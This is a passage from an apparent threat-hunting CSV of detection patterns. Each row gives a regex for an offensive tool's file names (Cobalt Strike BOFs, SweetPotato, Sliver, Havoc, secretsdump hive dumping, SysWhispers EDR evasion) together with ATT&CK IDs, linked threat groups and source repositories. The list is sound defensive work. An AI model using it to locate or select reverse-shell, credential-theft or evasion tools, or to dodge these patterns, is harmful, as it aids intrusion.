By establishing a reverse SSH tunnel it obtains a fully interactive Shell and supports multi-platform architecture Payload","T1090 - T1059 - T1021","TA0011 - TA0005 - TA0002","N/A","N/A","C2","https://github.com/tdragon6/Supershell","1","1","N/A","N/A","10","10","1561","196","2023-09-26T13:53:55Z","2023-03-25T15:02:43Z","11735" "*/Suprise/Suprise.exe*",".{0,1000}\/Suprise\/Suprise\.exe.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","1","N/A","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","11737" "*/SurveyFile_x64_Release.exe*",".{0,1000}\/SurveyFile_x64_Release\.exe.{0,1000}","offensive_tool_keyword","Tsunami","another C2 framework","T1573 - T1027 - T1059 - T1071 ","TA0011 - TA0009 - TA0003 - TA0007 - TA0008","N/A","N/A","C2","https://github.com/trustedsec/The_Shelf","1","1","N/A","N/A","10","3","247","14","2024-11-25T19:33:34Z","2024-05-22T14:31:52Z","11738" "*/SurveyRegistry_x64_Release.exe*",".{0,1000}\/SurveyRegistry_x64_Release\.exe.{0,1000}","offensive_tool_keyword","Tsunami","another C2 framework","T1573 - T1027 - T1059 - T1071 ","TA0011 - TA0009 - TA0003 - TA0007 - TA0008","N/A","N/A","C2","https://github.com/trustedsec/The_Shelf","1","1","N/A","N/A","10","3","247","14","2024-11-25T19:33:34Z","2024-05-22T14:31:52Z","11739" "*/suspect/master/suspect.sh*",".{0,1000}\/suspect\/master\/suspect\.sh.{0,1000}","offensive_tool_keyword","Orc","Orc is a post-exploitation framework for Linux written in Bash","T1059.004 - T1036.005 - T1070.002 - T1012 - T1082 - T1003 - T1555.003 - T1049 - T1134.001 - T1202","TA0005 - TA0003 - TA0002 - TA0006 - TA0011","N/A","N/A","Exploitation 
tool","https://github.com/zMarch/Orc","1","1","#linux","N/A","9","4","395","53","2019-11-12T18:21:27Z","2018-08-16T11:31:39Z","11740" "*/suspendresume.x64*",".{0,1000}\/suspendresume\.x64.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobaltstrike injection BOFs","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/trustedsec/CS-Remote-OPs-BOF","1","1","N/A","N/A","10","10","959","147","2025-02-26T21:21:25Z","2022-04-25T16:32:08Z","11741" "*/suspendresume.x86*",".{0,1000}\/suspendresume\.x86.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobaltstrike injection BOFs","T1548.002 - T1548.003 - T1134.001 - T1134.003 - 
T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/trustedsec/CS-Remote-OPs-BOF","1","1","N/A","N/A","10","10","959","147","2025-02-26T21:21:25Z","2022-04-25T16:32:08Z","11742" "*/svchost_console.exe*",".{0,1000}\/svchost_console\.exe.{0,1000}","offensive_tool_keyword","gh0st","Malware RAT with keylogger - dll injection - C2 - Remote control","T1204.002 - T1071.001 - T1027 - T1036.005 - T1055.001 - T1005 - T1056.001 - T1074.001 - T1105 - T1562.001 - T1543.003 - T1547.001 - T1571 - T1573.001 - T1106 - T1219","TA0002 - TA0003 - TA0004 - TA0008 - TA0009 - TA0010 - 
TA0011","GhostRAT","N/A","Malware","https://github.com/sin5678/gh0st","1","1","N/A","N/A","10","6","508","274","2013-05-08T21:17:26Z","2012-10-05T06:25:36Z","11743" "*/svn-brute.nse*",".{0,1000}\/svn\-brute\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","11744" "*/SweetPotato.dll*",".{0,1000}\/SweetPotato\.dll.{0,1000}","offensive_tool_keyword","Godzilla","Webshell Manager Tool that provide request proxy, server info, RCE shell, terminal execution, memory shell, port forwarding, and MSF bind/reverse shell capabilities.","T1100 - T1018 - T1059 - T1090 - T1021 - T1205 - T1105 - T1568","TA0001 - TA0002 - TA0003 - TA0011","N/A","N/A","C2","https://github.com/BeichenDream/Godzilla","1","1","N/A","N/A","10","10","4096","551","2024-07-17T07:56:35Z","2020-08-17T17:27:56Z","11745" "*/SweetPotato.dll*",".{0,1000}\/SweetPotato\.dll.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","1","N/A","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","11746" "*/SweetPotato.exe*",".{0,1000}\/SweetPotato\.exe.{0,1000}","offensive_tool_keyword","taowu-cobalt-strike","Collection of hacktools binaries","T1003 - T1059 - T1087 - T1110 - T1135 - T1047 - T1078 - T1086 - T1098 - T1212 - T1021 - T1056 - T1071 - T1210 - T1484 - T1555 - T1055 - T1005 - T1090 - T1080 - T1204 - T1496 - T1114 - T1562 - T1482 - T1505 - T1548 - T1560 - T1566 - T1218 - T1547 - 
T1070 - T1206 - T1208","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/pandasec888/taowu-cobalt_strike/tree/312fec79b3413ecfc06bc43efccfcbc1383a3566","1","1","N/A","N/A","10","10","1797","330","2023-10-31T09:13:10Z","2020-07-05T10:13:00Z","11747" "*/SweetPotato.exe*",".{0,1000}\/SweetPotato\.exe.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","1","N/A","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","11748" "*/Sweetpotato.exe*",".{0,1000}\/Sweetpotato\.exe.{0,1000}","offensive_tool_keyword","SweetPotato","Local Service to SYSTEM privilege escalation from Windows 7 to Windows 10 / Server 2019","T1548 - T1055","TA0004 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/CCob/SweetPotato","1","1","N/A","N/A","10","10","1697","228","2024-09-04T17:09:30Z","2020-04-12T17:40:03Z","11749" "*/SweetPotato.git*",".{0,1000}\/SweetPotato\.git.{0,1000}","offensive_tool_keyword","SweetPotato","Local Service to SYSTEM privilege escalation from Windows 7 to Windows 10 / Server 2019","T1548 - T1055","TA0004 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/CCob/SweetPotato","1","1","N/A","N/A","10","10","1697","228","2024-09-04T17:09:30Z","2020-04-12T17:40:03Z","11750" 
"*/SweetPotato_CS*",".{0,1000}\/SweetPotato_CS.{0,1000}","offensive_tool_keyword","cobaltstrike","Modified SweetPotato to work with CobaltStrike v4.0","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/Tycx2ry/SweetPotato_CS","1","1","N/A","N/A","10","10","241","48","2020-04-30T14:27:20Z","2020-04-16T08:01:31Z","11751" "*/SweetPotato-master.zip*",".{0,1000}\/SweetPotato\-master\.zip.{0,1000}","offensive_tool_keyword","SweetPotato","Local Service to SYSTEM privilege escalation from Windows 7 to Windows 10 / Server 2019","T1548 - T1055","TA0004 - TA0005","N/A","N/A","Privilege 
Escalation","https://github.com/CCob/SweetPotato","1","1","N/A","N/A","10","10","1697","228","2024-09-04T17:09:30Z","2020-04-12T17:40:03Z","11752" "*/SwitchPriv.exe*",".{0,1000}\/SwitchPriv\.exe.{0,1000}","offensive_tool_keyword","PrivFu","enable or disable specific token privileges for a process","T1055","TA0004","N/A","N/A","Privilege Escalation","https://github.com/daem0nc0re/PrivFu","1","1","N/A","SwitchPriv","10","9","849","122","2025-01-21T05:22:50Z","2021-12-28T13:14:25Z","11753" "*/Synergy-httpx.git*",".{0,1000}\/Synergy\-httpx\.git.{0,1000}","offensive_tool_keyword","Synergy-httpx","A Python http(s) server designed to assist in red teaming activities such as receiving intercepted data via POST requests and serving content dynamically","T1021.002 - T1105 - T1090","TA0002 - TA0011 - TA0005","N/A","N/A","Data Exfiltration","https://github.com/t3l3machus/Synergy-httpx","1","1","N/A","N/A","8","2","129","17","2024-07-19T06:40:59Z","2023-06-02T10:06:41Z","11757" "*/syscalls/syscalls_windows.go*",".{0,1000}\/syscalls\/syscalls_windows\.go.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","AvosLocker - APT29 - Cinnamon Tempest - GOLD CABIN - COZY BEAR - Black Basta","C2","https://github.com/BishopFox/sliver","1","1","N/A","N/A","10","10","9218","1249","2025-04-21T17:52:43Z","2019-01-17T22:07:38Z","11758" "*/syscalls/syswhispers/*",".{0,1000}\/syscalls\/syswhispers\/.{0,1000}","offensive_tool_keyword","inceptor","Template-Driven AV/EDR Evasion Framework","T1027 - T1055 - T1070 - T1112 - T1140","TA0005 - TA0006 - TA0008","N/A","N/A","Defense 
Evasion","https://github.com/klezVirus/inceptor","1","1","N/A","N/A","10","10","1668","270","2023-11-03T09:33:21Z","2021-08-02T15:35:57Z","11759" "*/syscalls/syswhispersv2*",".{0,1000}\/syscalls\/syswhispersv2.{0,1000}","offensive_tool_keyword","inceptor","Template-Driven AV/EDR Evasion Framework","T1027 - T1055 - T1070 - T1112 - T1140","TA0005 - TA0006 - TA0008","N/A","N/A","Defense Evasion","https://github.com/klezVirus/inceptor","1","1","N/A","N/A","10","10","1668","270","2023-11-03T09:33:21Z","2021-08-02T15:35:57Z","11760" "*/SyscallsInject/*",".{0,1000}\/SyscallsInject\/.{0,1000}","offensive_tool_keyword","cobaltstrike","Collection of Beacon Object Files","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 
- Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/ajpc500/BOFs","1","1","N/A","N/A","10","10","583","114","2022-11-01T14:51:07Z","2020-12-19T11:21:40Z","11761" "*/sysconfig/iodine-server*",".{0,1000}\/sysconfig\/iodine\-server.{0,1000}","offensive_tool_keyword","iodine","iodine. iodined - tunnel IPv4 over DNS","T1573.001 - T1573.002 - T1573.003 - T1573.004","TA0011 - TA0010 - TA0002 - TA0005","N/A","EMBER BEAR","C2","https://github.com/yarrick/iodine","1","0","#linux","N/A","10","10","6413","524","2025-04-08T17:44:12Z","2012-02-04T19:51:39Z","11762" "*/syskey-and-sam.html*",".{0,1000}\/syskey\-and\-sam\.html.{0,1000}","offensive_tool_keyword","secretsdump","secretdump.py from impacket - https://github.com/fortra/impacket","T1003.003","TA0006","Operation Wocao","Black Basta - Rhysida - HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound - ALLANITE","Credential Access","https://github.com/fortra/impacket","1","0","N/A","N/A","10","10","14198","3681","2025-04-22T13:40:55Z","2015-04-15T14:04:07Z","11763" "*/SysmonQuiet*",".{0,1000}\/SysmonQuiet.{0,1000}","offensive_tool_keyword","sysmonquiet","RDLL for Cobalt Strike beacon to silence Sysmon process","T1055 - T1055.012 - T1063","TA0002 - TA0003 - TA0008","N/A","N/A","Defense Evasion","https://github.com/ScriptIdiot/SysmonQuiet","1","1","N/A","N/A","N/A","1","88","16","2022-09-09T12:28:15Z","2022-07-11T14:17:34Z","11764" "*/system:SystemBkup.hiv /sam:SamBkup.hiv*",".{0,1000}\/system\:SystemBkup\.hiv\s\/sam\:SamBkup\.hiv.{0,1000}","offensive_tool_keyword","Pezor","Open-Source Shellcode & PE Packer","T1027 - T1045 - T1055 - T1140 - T1204 - T1218","TA0005 - TA0043","N/A","N/A","Defense Evasion","https://github.com/phra/PEzor","1","0","#linux","N/A","10","10","1936","330","2024-02-03T19:11:05Z","2020-07-22T09:45:52Z","11768" "*/SysWhispers2*",".{0,1000}\/SysWhispers2.{0,1000}","offensive_tool_keyword","SysWhispers3","SysWhispers on Steroids - 
AV/EDR evasion via direct system calls.","T1059 - T1573 - T1218 - T1216","TA0002 - TA0008 - TA0011","N/A","N/A","Defense Evasion","https://github.com/klezVirus/SysWhispers3","1","1","N/A","N/A","N/A","10","1414","180","2024-07-31T05:24:06Z","2022-03-07T18:56:21Z","11771" "*/SysWhispers3*",".{0,1000}\/SysWhispers3.{0,1000}","offensive_tool_keyword","SysWhispers3","SysWhispers on Steroids - AV/EDR evasion via direct system calls.","T1059 - T1573 - T1218 - T1216","TA0002 - TA0008 - TA0011","N/A","N/A","Defense Evasion","https://github.com/klezVirus/SysWhispers3","1","1","N/A","N/A","N/A","10","1414","180","2024-07-31T05:24:06Z","2022-03-07T18:56:21Z","11772" "*/SysWhispers3.git*",".{0,1000}\/SysWhispers3\.git.{0,1000}","offensive_tool_keyword","SysWhispers3","SysWhispers on Steroids - AV/EDR evasion via direct system calls.","T1059 - T1573 - T1218 - T1216","TA0002 - TA0008 - TA0011","N/A","N/A","Defense Evasion","https://github.com/klezVirus/SysWhispers3","1","1","N/A","N/A","N/A","10","1414","180","2024-07-31T05:24:06Z","2022-03-07T18:56:21Z","11773" "*/syswhispersv2*",".{0,1000}\/syswhispersv2.{0,1000}","offensive_tool_keyword","inceptor","Template-Driven AV/EDR Evasion Framework","T1562.001 - T1059.003 - T1027.002 - T1070.004","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/klezVirus/inceptor","1","1","N/A","N/A","10","10","1668","270","2023-11-03T09:33:21Z","2021-08-02T15:35:57Z","11774" "*/t.me/NicestRAT*",".{0,1000}\/t\.me\/NicestRAT.{0,1000}","offensive_tool_keyword","cstealer","NiceRAT stealer - clone of cstealer","T1056.001 - T1560.001 - T1564.004 - T1113 - T1003 - T1036 - T1555.003 - T1555.001 - T1213.002 - T1027.002","TA0006 - TA0009 - TA0010","N/A","N/A","Credential Access","https://github.com/0x00G/NiceRAT","1","1","N/A","N/A","10","2","118","86","2024-10-20T18:38:53Z","2022-11-20T19:11:00Z","11775" "*/t2w.py*",".{0,1000}\/t2w\.py.{0,1000}","offensive_tool_keyword","tor2web","Tor2web is an HTTP proxy software that enables access to Tor 
Hidden Services by mean of common web browsers","T1090 - T1071","TA0001 - TA0005","N/A","N/A","Defense Evasion","https://github.com/tor2web/Tor2web","1","0","#linux","N/A","9","8","718","177","2024-05-24T11:51:09Z","2011-12-17T15:14:02Z","11776" "*/t3l3machus/Villain*",".{0,1000}\/t3l3machus\/Villain.{0,1000}","offensive_tool_keyword","Villain","Villain is a C2 framework that can handle multiple TCP socket & HoaxShell-based reverse shells. enhance their functionality with additional features (commands. utilities etc) and share them among connected sibling servers (Villain instances running on different machines).","T1021 - T1055 - T1071 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/t3l3machus/Villain","1","1","#linux","N/A","10","10","3992","642","2025-01-19T18:37:12Z","2022-10-25T22:02:59Z","11777" "*/taidoor.profile*",".{0,1000}\/taidoor\.profile.{0,1000}","offensive_tool_keyword","cobaltstrike","Malleable C2 is a domain specific language to redefine indicators in Beacon's communication. This repository is a collection of Malleable C2 profiles that you may use. 
These profiles work with Cobalt Strike 3.x","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/rsmudge/Malleable-C2-Profiles","1","1","N/A","N/A","10","10","1531","425","2021-05-18T14:45:39Z","2014-07-14T15:02:42Z","11787" "*/TakeMyRDP*",".{0,1000}\/TakeMyRDP.{0,1000}","offensive_tool_keyword","TakeMyRDP","A keystroke logger targeting the Remote Desktop Protocol (RDP) related processes","T1056.001 - T1021.001 - T1057","TA0002 - TA0003 - TA0007","N/A","N/A","Exploitation tool","https://github.com/TheD1rkMtr/TakeMyRDP","1","1","N/A","N/A","N/A","4","386","63","2023-08-02T02:23:28Z","2023-07-02T17:25:33Z","11801" 
"*/TakeMyRDP2.0*",".{0,1000}\/TakeMyRDP2\.0.{0,1000}","offensive_tool_keyword","Amnesiac","Amnesiac is a post-exploitation framework entirely written in PowerShell and designed to assist with Lateral Movement within Active Directory environments","T1021.002 - T1550.002","TA0008","N/A","Black Basta","Framework","https://github.com/Leo4j/Amnesiac","1","1","N/A","N/A","10","5","415","63","2025-03-18T09:32:04Z","2023-10-31T15:06:25Z","11802" "*/Talon.py*",".{0,1000}\/Talon\.py.{0,1000}","offensive_tool_keyword","havoc","Havoc is a modern and malleable post-exploitation command and control framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1027 - T1071-001 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001","TA0002 - TA0003","N/A","Dispossessor","C2","https://github.com/HavocFramework/Havoc","1","0","#linux","N/A","10","10","7449","1050","2025-01-23T23:42:35Z","2022-09-11T13:21:16Z","11803" "*/Talon/*Agent/Source*",".{0,1000}\/Talon\/.{0,1000}Agent\/Source.{0,1000}","offensive_tool_keyword","havoc","Havoc is a modern and malleable post-exploitation command and control framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1027 - T1071-001 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001","TA0002 - TA0003","N/A","Dispossessor","C2","https://github.com/HavocFramework/Havoc","1","1","N/A","N/A","10","10","7449","1050","2025-01-23T23:42:35Z","2022-09-11T13:21:16Z","11804" "*/TaoWu.cna*",".{0,1000}\/TaoWu\.cna.{0,1000}","offensive_tool_keyword","taowu-cobalt-strike","Collection of hacktools binaries","T1003 - T1059 - T1087 - T1110 - T1135 - T1047 - T1078 - T1086 - T1098 - T1212 - T1021 - T1056 - T1071 - T1210 - T1484 - T1555 - T1055 - T1005 - T1090 - T1080 - T1204 - T1496 - T1114 - T1562 - T1482 - T1505 - T1548 - T1560 - T1566 - T1218 - T1547 - T1070 - T1206 - T1208","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - 
TA0011","N/A","N/A","Exploitation tool","https://github.com/pandasec888/taowu-cobalt_strike/tree/312fec79b3413ecfc06bc43efccfcbc1383a3566","1","1","N/A","N/A","10","10","1797","330","2023-10-31T09:13:10Z","2020-07-05T10:13:00Z","11805" "*/target:exe spacerunner.cs*",".{0,1000}\/target\:exe\sspacerunner\.cs.{0,1000}","offensive_tool_keyword","SpaceRunner","enables the compilation of a C# program that will execute arbitrary PowerShell code without launching PowerShell processes through the use of runspace.","T1059.001 - T1027","TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/Mr-B0b/SpaceRunner","1","0","N/A","N/A","7","2","195","38","2020-07-26T10:39:53Z","2020-07-26T09:31:09Z","11806" "*/targetedKerberoast*",".{0,1000}\/targetedKerberoast.{0,1000}","offensive_tool_keyword","targetedKerberoast","Kerberoast with ACL abuse capabilities","T1558.003 - T1208","TA0006 - TA0007","N/A","N/A","Exploitation tool","https://github.com/ShutdownRepo/targetedKerberoast","1","1","N/A","N/A","N/A","5","442","63","2024-12-16T07:32:14Z","2021-08-02T20:19:35Z","11807" "*/targetedKerberoast.py*",".{0,1000}\/targetedKerberoast\.py.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559","TA0043 - TA0002 - TA0004 - TA0011 - TA0003","N/A","Black Basta","Exploitation tool","https://github.com/ThePorgs/Exegol","1","1","N/A","N/A","10","10","2354","209","2025-04-09T16:56:24Z","2020-03-09T19:12:11Z","11808" "*/targets-asn.nse*",".{0,1000}\/targets\-asn\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","11809" "*/targets-ipv6-map4to6.nse*",".{0,1000}\/targets\-ipv6\-map4to6\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","11810" "*/targets-ipv6-multicast-echo.nse*",".{0,1000}\/targets\-ipv6\-multicast\-echo\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE 